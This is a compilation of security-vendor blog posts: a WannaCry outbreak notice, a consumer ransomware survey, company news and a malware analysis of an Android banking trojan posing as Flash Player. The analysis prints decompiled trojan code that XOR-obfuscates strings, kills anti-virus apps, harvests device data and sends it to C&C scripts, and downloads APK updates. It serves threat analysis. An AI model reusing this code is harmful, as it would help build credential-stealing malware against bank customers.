List of WannaCry ransomware files used in widespread attacks

Ransomware is the number one cybersecurity threat facing consumers and business worldwide. (Trustlook posted research last month on just how big of a problem for consumers ransomware is becoming.)

Today’s WannaCry outbreak is just more evidence of the severe threat posed by ransomware. Banks, telephone companies and hospitals have all been ensnared in the worldwide hack, with the malware locking down computers while demanding a hefty sum for freedom.

The attack has hit close to 100,000 computers across China, Russia, Spain, Italy and Vietnam, but the UK hospitals have attracted the most attention because real lives at risk while their devices are locked down.

The malware used in the attacks encrypts the files and also drops and executes a decryptor tool. The request for $600 in Bitcoin is displayed along with the wallet. It’s interesting that the initial request in this sample is for $600 USD, as the first five payments to that wallet is approximately $300 USD. It suggests that the group is increasing the ransom demands.


Trustlook has identified the following files used in the WannaCry ransomware attack. Analysis is ongoing, and we will update this blog with more information.



























38% of Consumers Affected by Ransomware Pay Up

New study reveals shocking statistics on ransomware

If you think ransomware is a problem that impacts only deep-pocketed big businesses like hospitals or banks, new research by cybersecurity firm Trustlook might make you think differently. In its latest research, Trustlook found that consumers are increasingly being targeted with ransomware—and, perhaps surprisingly, many of them are paying up.

Ransomware is malicious software that locks all files on a targeted computer or network until the owner pays the ransom. While it’s true that hackers may have more to gain from large organizations, experts say they see consumers, with their lack of sophistication in security, as lower-hanging fruit. Because consumers usually have fewer information security resources than large organizations, breaches are far easier to achieve and are more likely to have a meaningful impact, and thus are more likely to result in a payment.

Most users are completely unaware of the threat posed by ransomware attacks and are not prepared to handle them. Trustlook’s research shows that this lack of awareness and apathy is resulting in insufficient action taken to protect devices and data. 48% of consumers are not worried about becoming a victim of a ransomware attack, and only 7% of non-impacted consumers say they would pay the ransom if they were hacked. Other findings include:

  • 17% of consumers have been infected with ransomware
  • 38% of affected consumers paid the ransom
  • $100-$500 was the dollar range of ransomware payouts by consumers
  • 45% of consumers have not heard of ransomware
  • 23% of consumers do not backup the files on their computer or mobile device

Since the beginning of 2016, ransomware has gone from a relatively exclusive category of malware utility to a mainstream destructive tool used in wave after wave of phishing attacks against individuals and companies alike. Ransomware is now so widespread that it cost businesses a total of $1 billion in 2016, according to a new report. Moreover, ransomware has been identified by the U.S. Department of Justice as the “biggest cyberthreat” of 2017.

Ransomware is delivered primarily via a phishing email, which means consumers and employees, who are the last lines of defense in any security stack, must be trained to identify it in order to prevent it. This has made traditional security measures, such as antivirus tools, less effective.

In addition, the rise of crypto currencies such as Bitcoin have had a dramatic impact on the number and type of cybercrime opportunities. These tools have become the engine of cybercrime by making it safe and easy to transfer money anonymously.

Trustlook has the following advice for consumers who are worried that they might become a victim of ransomware. “Backup your data to multiple devices, and to at least one device that is not connected to a network,” says Allan Zhang, co-founder and CEO of Trustlook. “Also, be cautious of emails by checking the sender’s email address before clicking any link.”

To see an infographic of Trustlook’s ransomware research findings, please click here. For more information on SECUREai, Trustlook’s artificial intelligence security engine that detects ransomware, please visit

Trojan Steals Account Information from European Banking Apps

A banking trojan discovered by Trustlook labs targets European banks and can steal users’ banking credentials. To make matters worse, the trojan is also capable of blocking most anti-virus apps.

The trojan disguises itself as an Adobe Flash Player app on Google Play. The malware hides string constants, keeps them encoded, and only decodes them before they are used.

The package can be identified as having the following characteristics:

  • MD5: b3a83ea6252bc7a4303774c1cd2c3b6f
  • SHA256: 784c835761e0223a46195fccbffae9fc0e19725ee989fe08e9d9fe119f7d4056
  • Size: 395595
  • App name: AdobeFlashPlayer
  • Package name: update.Adobe.Flash.Player

The package icon is:


The malware hides critical strings in order to prevent identification. It uses an exclusive or (XOR) operation to obfuscate the strings.

One of the encoding functions is shown below. The malware uses 7 similar functions to encode the string:

  public static String a(String paramString)
    int i = paramString.length();
    char[] arrayOfChar = new char[i];
    int j = i - 1;
    for (i = j; j >= 0; i = j)
      j = paramString.charAt(i);
      int k = i - 1;
      arrayOfChar[i] = ((char)(j ^ 0x52));
      if (k < 0) {
      j = k - 1;
      arrayOfChar[k] = ((char)(paramString.charAt(k) ^ 0x7D));
    return new String(arrayOfChar);

After encoding, the string becomes unreadable. Upon execution of the malware, the app attempts to terminate any anti-virus apps. The decoded strings are listed in the comments added by Trustlook :

    void a() {
        int v0;
        int v10 = 22;
        int v9 = -1;
        if(Build$VERSION.SDK_INT <= v10) {
            v0 = 0;
            int v3;
            for(v3 = 0; v0 > v9; v3 = v0) {
                String v5 = this.b();
                String[] v6 = new String[31];
                v6[0] = a.a("\u000E\u0001\u0000@\u0006\u000B\b\u001C\u000F\u0017C\u000F\t\u000F\u001A\u000F\u001F\u000B"); // com.keerby.adaware
                v6[1] = b.a("Y\u0004WE[\u0003T\u0007[\t\u0014\u001D\t\u0006U\tS\u0007_\u0018_\bO\u0019S\u001FC");//com.ahnlab.v3mobilesecurity
                v6[2] = a.a("\u000E\u0001\u0000@\f\u0018\f\u001D\u0019@\f\u0000\t\u001C\u0002\u0007\t@\u0000\u0001\u000F\u0007\u0001\u000B\u001E\u000B\u000E\u001B\u001F\u0007\u0019\u0017");//
                v6[3] = b.a("Y\u0004WE[\u0005N\u0002L\u0002H\u001EI");//com.antivirus
                v6[4] = a.a("\r\u0002\u0003C\u000F\u001B\u0007\u001F\u000FC\u000F\u0003\n\u001F\u0001\u0004\n");//
                v6[5] = b.a("Y\u0004WEX\u0002N\u000F_\r_\u0005^\u000EHE[\u0005N\u0002L\u0002H\u001EI");//com.bitdefender.antivirus
                v6[6] = a.a("\r\u0002\u0003C\f\u0018\u0002\u0001\t\u0018\u000F\u001F\nC\u0003\u0002\f\u0004\u0002\b@\u0000\u0001\u000F\u0007\u0001\u000B\u001E\u000B\u000E\u001B\u001F\u0007\u0019\u0017");//
                v6[7] = b.a("\bU\u0006\u0014\bU\u0006U\u000FUEY\u0002I\u0006_E[\u0005N\u0002L\u0002H\u001EI");//com.comodo.cisme.antivirus
    public String b() {
        String v0;
        if(Build$VERSION.SDK_INT <= 19) {
            List v1 = this.getSystemService(b.a("\nY\u001FS\u001DS\u001FC")).getRunningTasks(1);//activity
            v0 = v1.get(0).topActivity.getPackageName();
        else {
            v0 = this.getSystemService(a.a("\f\r\u0019\u0007\u001B\u0007\u0019\u0017")).getRunningAppProcesses().get(0).processName;

        return v0;

    protected void onHandleIntent(Intent arg1) {

The following is a list of the security apps whose processes are terminated by the malware:

  • keerby.adaware
  • ahnlab.v3mobilesecurity
  • antivirus
  • bitdefender.antivirus
  • comodo.cisme.antivirus
  • drweb
  • eScan.main
  • fortinet.forticlient
  • gdata.mobilesecurity
  • malwarebytes.antimalware
  • wsandroid.suite
  • pandasecurity.pandaav
  • quickheal.platform
  • sophos.smsec
  • trendmicro.tmmspersonal
  • trustport.mobilesecurity
  • ssd.vipre

The malware then looks for the banking apps’ processes. If found, the malware sends the information to the C&C server, and receives specific forms from the server to create a fake banking interface that entices users to enter their credentials.

public String a()
    Log.d(i.a("8,'+\"+3.4O=-6"), k.a("%\0357\n5\020V\0327\026=x5\024?\0358\fQ\013")); //INVISIBLE-LOG  SEARCH BANK CLIENT'S
    Object localObject1 = getPackageManager().getInstalledApplications(128).iterator();
    int i11 = 0;
    int i10 = 0;
    int i20 = 0;
    int i19 = 0;
    int i18 = 0;
    int i17 = 0;
    int i9 = 0;
    int i7 = 0;
    int i5 = 0;
    int i3 = 0;
    int i1 = 0;
    int m = 0;
    int i = 0;
    while (((Iterator)localObject1).hasNext())
      localObject2 = (ApplicationInfo)((Iterator)localObject1).next();
      int j = i11;
      if (((ApplicationInfo)localObject2).packageName.equals(i.a("\022\r\034L\020\t\023\003\037\t_\003\037\006\003\r\030\006_\003\001\022\002L\020\t\023\003\037\t.\006\030\020\024\t\005"))) {
        j = 1; //
      if (((ApplicationInfo)localObject2).packageName.equals(k.a(";\0315X>\0376\0276\005:\0276\035v\0337\0241\032=X;\023(\005-\024="))) {
        j = 2; //
      int k = i10;
      if (((ApplicationInfo)localObject2).packageName.equals(i.a(""))) {
        k = 1;
      if (((ApplicationInfo)localObject2).packageName.equals(k.a(";\0315X,\0337\024,\023;\036v\0369\0323\0249\0303"))) {
        k = 2; //com.tmobtech.halkbank

        PowerManager$WakeLock v0_2 = v0_1.getSystemService(k.a("(\u0019/\u0013*")).newWakeLock(1, i.a("\"\u0007\u0003\u0014\u0018\u0001\u0014"));
		//power Service
        if(v0_2 != null) {

        e v10 = new e();
        k v11 = new k();
        Object v0_3 = this.getSystemService(k.a("(\u001E7\u0018="));//phone
        String v1 = "";
        if(Build$VERSION.SDK_INT < 23) {
            v3 = ((TelephonyManager)v0_3).getDeviceId();
            v2 = new StringBuilder().insert(0, i.a("Y")).append(((TelephonyManager)v0_3).getNetworkOperatorName()).append(k.a("q")).append(((TelephonyManager)v0_3).getLine1Number()).toString();
            v7 = v3;
        else {
            v1 = Settings$Secure.getString(this.getContentResolver(), i.a("\u0003\u001F\u0006\u0003\r\u0018\u0006.\u000B\u0015"));//android_id
            if(v1 == "") {
                v1 = new StringBuilder().insert(0, k.a("Em")).append(Build.BOARD.length() % 10).append(Build.BRAND.length() % 10).append(Build.CPU_ABI.length() % 10).append(Build.DEVICE.length() % 10).append(Build.DISPLAY.length() % 10).append(Build.HOST.length() % 10).append(Build.ID.length() % 10).append(Build.MANUFACTURER.length() % 10).append(Build.MODEL.length() % 10).append(Build.PRODUCT.length() % 10).append(Build.TAGS.length() % 10).append(Build.TYPE.length() % 10).append(Build.USER.length() % 10).toString();

            v3 = i.a("J?-X");//(NO)
            v7 = v1;
            v1 = k.a("\u0011\u0018\u001F6\u0013<");//Indefined
            v2 = v3;

        String v4 = Build$VERSION.RELEASE;
        String v5 = new StringBuilder().insert(0, Build.MODEL).append(i.a("BY")).append(Build.PRODUCT).append(k.a("q")).toString();
        String v6 = ((TelephonyManager)v0_3).getNetworkCountryIso();
        String v8 = "";
        if(!this.getSystemService(k.a("<\u0013.\u001F;\u0013\u0007\u00067\u001A1\u0015!")).isAdminActive(null)) { //device_policy
            v3 = i.a("A");
            v0_1 = this;
        else {
            v3 = k.a("i");
            v0_1 = this;

        boolean v0_4 = v0_1.getSystemService(i.a("\t\u0014\u001B\u0016\u0017\u0010\u0010\u0015")).inKeyguardRestrictedInputMode(); //keyguard
        if(v0_4) {
            v0_5 = i.a("A");
            Log.e(k.a("jDj"), i.a("\u001E\u0004\u0017")); //222 off
        else {
            v0_5 = k.a("i");
            Log.e(i.a("CPC"), k.a("\u00196"));

        Log.e(i.a("\u0012\u001E\u0011\u0005"), new StringBuilder().insert(0, k.a("\u0002-\u001D\u0007\u0006e")).append(v11.b(new StringBuilder().insert(0, v7).append(i.a("K")).append(v3).append(k.a("b")).append(v0_5).toString())).toString());
		//post tuk_p=
        v0_5 = v11.c(v10.a(this.a.d + i.a("M\u0010\u0006\u001C\u000B\u001F\u000E\u001E\u0006^\u0005\u0010\u0016\u0014L\u0001\n\u0001"), new StringBuilder().insert(0, k.a("\u0006e")).append(v11.b(new StringBuilder().insert(0, v7).append(i.a("K")).append(v3).append(k.a("b")).append(v0_5).toString())).toString())); ///adminlod/gate.php
        Log.e("", new StringBuilder().insert(0, i.a("QOQ\\Q")).append(v0_5).toString());
        if(v0_5.contains(k.a("\n\u00169$"))) {
            v0_5 = this.a();
            System.out.println(new StringBuilder().insert(0, i.a("\u0002\u0007\u0005=\u0015\u0003\u0005\u0003.\u0012L")).append(v11.b(new StringBuilder().insert(0, " ").append(v7).append(k.a("b")).append(v2).append(v1).append(i.a("K")).append(v4).append(k.a("b")).append(v6).append(i.a("K")).append(v0_5).append(k.a("b")).append(v5).toString())).toString()); // set_data_p=
            v3 = this.a.d + i.a("^\u0003\u0015\u000F\u0018\f\u001D\r\u0015M\u0003\u0007\u0016L\u0001\n\u0001"); ///adminlod/reg.php
            StringBuilder v9 = new StringBuilder().insert(0, k.a("\u0006e"));
            StringBuilder v0_6 = new StringBuilder().insert(0, v7).append(i.a("K")).append(v2).append(v1).append(k.a("b")).append(v4).append(i.a("K")).append(v6).append(k.a("b")).append(v0_5).append(i.a("K")).append(v5).append(k.a("b"));
            v0_5 = v11.c(v10.a(v3, v9.append(v11.b(v0_6.append("DDD").append(i.a("K")).append(v8).toString())).toString()));

The affected bank apps are:

  • garanti.cepsubesi
  • tmobtech.halkbank
  • pozitron.iscep
  • ziraat.ziraatmobil
  • whatsapp
  • facebook.orca
  • facebook.katana
  • supercell.clashroyale
  • supercell.clashofclans
  • bawag.mbanking
  • easybank.mbanking
  • isis_papyrus.raiffeisen_pay_eyewdg
  • spardat.netbanking
  • volksbank.volksbankmobile
  • co.tsb.mobilebank
  • creditagricole.androidapp
  • bzwbk.bzwbk24
  • bzwbk.bzwbk24
  • eurobank
  • getingroup.mobilebanking
  • ing.ingmobile
  • ing.ingmobile
  • pkobp.iko
  • mbank
  • android.bcpBankingApp.millenniumPL
  • eleader.mobilebanking.pekao
  • eleader.mobilebanking.raiffeisen
  • commerzbanking.mobil
  • ing.diba.mbbr2
  • postbank.finanzassistent
  • dkb.portalapp
  • consorsbank
  • axa.monaxa
  • banquepopulaire.cyberplus
  • bnpparibas.mescomptes
  • cic_prod.bad
  • cm_prod.bad
  • groupama.toujoursla
  • IngDirectAndroid
  • ocito.cdn.activity.creditdunord

The malware is capable of stealing a user’s contacts , sending an SMS message, opening a web page, updating itself and more. The following code snippets demonstrate how the malware downloads an APK and updates itself:

            if(v9_1[v8_1].contains(i.a("7\u0001\u0006\u0010\u0016\u0014\u0011. \u001E\u0016\u0002"))) {//Updates_Bots
                v2 = v11.a(v9_1[v8_1], k.a("\n6\u00035\u0014=\u0004e"), i.a("\u001E\u0005\u0007\t\u0016L"));//|number= |text=
                v0_9 = v9_1[v8_1].split(k.a(",\u0013 \u0002e")); //text=
                System.out.println(new StringBuilder().insert(0, v2).append(v0_9[1]).toString());
                Log.d("", "");
                v3 = UUID.randomUUID().toString();
                v4 = i.a("L\u0010\u0012\u001A");//.apk
                try {
                    URLConnection v0_12 = new URL(v0_9[1]).openConnection();
                    ((HttpURLConnection)v0_12).setRequestMethod(k.a("\u001F3\f")); //GET
                    v1 = Environment.getExternalStorageDirectory() + i.a("M\u0015\r\u0006\f\u001D\r\u0010\u0006^"); ///download/
                    Log.v("", new StringBuilder().insert(0, k.a("&\u0019\"\u0010Lx")).append(v1).toString()); //PATH: 
                    File v5_1 = new File(v1);
                    v5_2 = new FileOutputStream(new File(v5_1, new StringBuilder().insert(0, v3).append(v4).toString()));
                    v1_1 = ((HttpURLConnection)v0_12).getInputStream();
                    v6_2 = new byte[4096];
                    v0_13 = v1_1;
                    goto label_524;

Banking malware that steals users’ log in credentials is becoming an increasing problem. Most of this category of malware, as is highlighted in this post, attempts to stay hidden to prevent analysis and detection. It also uses an obfuscation technique to make textual data unreadable. Using these techniques of hiding strings and masking data is useful for malware writers because it requires much more time for analysis to be done and the malware to be identified.

Thankfully, in this case, Trustlook was able to gather deep insights and knowledge of the malware behavior. Trustlook’s SECUREai anti-threat platform can effectively protect users against this invasion.

Trustlook Responds to Government Repeal of Broadband Privacy Rules

Last month’s proposal by the Trump administration to reverse the privacy regulations put in place by the Obama administration in October 2016 could lead to an increase in phishing attacks, according to cybersecurity company Trustlook.

The FCC rules would have given consumers greater control over what their internet service provider can do with their data by requiring those companies to get permission from customers before using their information to create targeted advertisements.

Under the regulation rollback, there are few limits on the ways ISPs will be allowed to interact with sensitive user data. That includes not just allowing providers to create marketing profiles based on the browsing history of their users, but also letting them deploy undetectable tools that track web traffic, too.

Trustlook CEO Allan Zhang shared this quote with ThreatPost:

“Our bigger concern is once this data is freely sold and traded, it is possible for bad actors to acquire this data and perpetrate personalized phishing attacks,” said Allan Zhang, co-founder and CEO of cybersecurity company Trustlook. He added, because apps such as AppFlash collect personal data legally and malware detectors don’t identify them, consumers will likely be oblivious to how their personal information is being collected and used.

You can read the entire article here.


Trustlook is part of the blazing fast Qualcomm Snapdragon 835 chipset

Lynn La from CNET wrote a great story describing the benefits of the new Qualcomm Snapdragon 835 chipset. And low and behold, she also included an image of the Trustlook Mobile Security app (image #16 in the story), which is part of the new Snapdragon chipset. Make sure your next device takes advantage of the speed and security that the new Qualcomm Snapdragon 835 chip offers.

Read about it here.


Senior Avast Sales Leader Joins Trustlook as VP of Global Sales and Business Development

Everyone here at Trustlook is thrilled to welcome Fangyu Ding to the team. Fangyu brings a lot of security experience to our company. Below is the official press release that went out today.


Trustlook, the company that offers SECUREai, a suite of embeddable security engines that identify advanced malware using proprietary AI technology, today announced that Fangyu Ding has joined the company as Senior Vice President of Global Sales and Business Development, reporting to Allan Zhang, Co-Founder and CEO of Trustlook. Ding brings extensive management experience and a global perspective to Trustlook’s executive team during a period of rapid growth and expansion. His responsibilities include global sales and oversight of Trustlook’s business development operations.

“Fangyu is a proven leader and industry veteran who will help us scale, and play a key role in executing on our growth strategy as we continue our evolution to a multi-product cybersecurity solution,” said Allan Zhang, Co-Founder and CEO of Trustlook. “His wealth of experience with global executives and security teams has given him a clear understanding of precisely what our marketplace needs and how best to deliver it. I’m delighted to be working with him as Trustlook enters its next stage of expansion.”

Ding brings to Trustlook 20 years of leadership experience in the security sector, including mobile devices, network appliances, and the Internet of Things. He was most recently Vice President of Business Development for AVG, the multi-billion-dollar cybersecurity company that was acquired by Avast in 2016. Ding has long been a proponent of dynamic behavioral detection technology in the cybersecurity industry in his work with Sana Security, an early pioneer of AI for PC malware, which was later acquired by AVG. He has a proven ability to drive organizations through various stages of development to become truly global companies.

“With its revolutionary SECUREai security engine, Trustlook has a significant opportunity to help organizations across the world access the latest advancements in cybersecurity,” said Fangyu Ding, Senior Vice President of Global Sales and Business Development at Trustlook. “Trustlook has industry-leading technology and strong partnerships with worldwide tech leaders such as Huawei, Qualcomm, and Tecno. This puts us in a strong position in the $200 billion cybersecurity market. I look forward to capitalizing fully on this opportunity.”

Ding has an MBA from the Haas School of Business at the University of California, Berkeley. His role will be based out of the company’s headquarters in San Jose, California, but he will also spend significant time supporting Trustlook’s China office, as the company continues to solidify its position as the market leader in China.